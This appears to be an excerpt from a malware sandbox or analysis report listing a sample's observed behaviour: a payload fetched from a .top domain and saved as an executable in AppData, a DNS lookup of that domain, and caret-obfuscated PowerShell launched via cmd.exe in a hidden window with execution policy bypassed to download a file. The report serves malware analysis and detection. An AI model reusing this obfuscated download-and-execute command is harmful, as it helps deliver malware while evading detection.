Technical Information
- http://coolzeropa.top/admin.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^eRSH^eLL.EXE ^-eXecuTIonpol^icY b^y^p^As^s ^-N^oP^R^o^F^iLE -WindOWStYLe ^HIddE^n (N^e^w-^ob^J^E^c^T sYS^T^e^M^.nET.w^eb^Cl^ieNT^).d^oW^n^l^O^adfi^le('http://coolzeropa.top/...
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /C "PoW^eRSH^eLL.EXE ^-eXecuTIonpol^icY b^y^p^As^s ^-N^oP^R^o^F^iLE -WindOWStYLe ^HIddE^n (N^e^w-^ob^J^E^c^T sYS^T^e^M^.nET.w^eb^Cl^ieNT^).d^oW^n^l^O^adfi^le('http://coolzeropa.top/...' (with hidden window)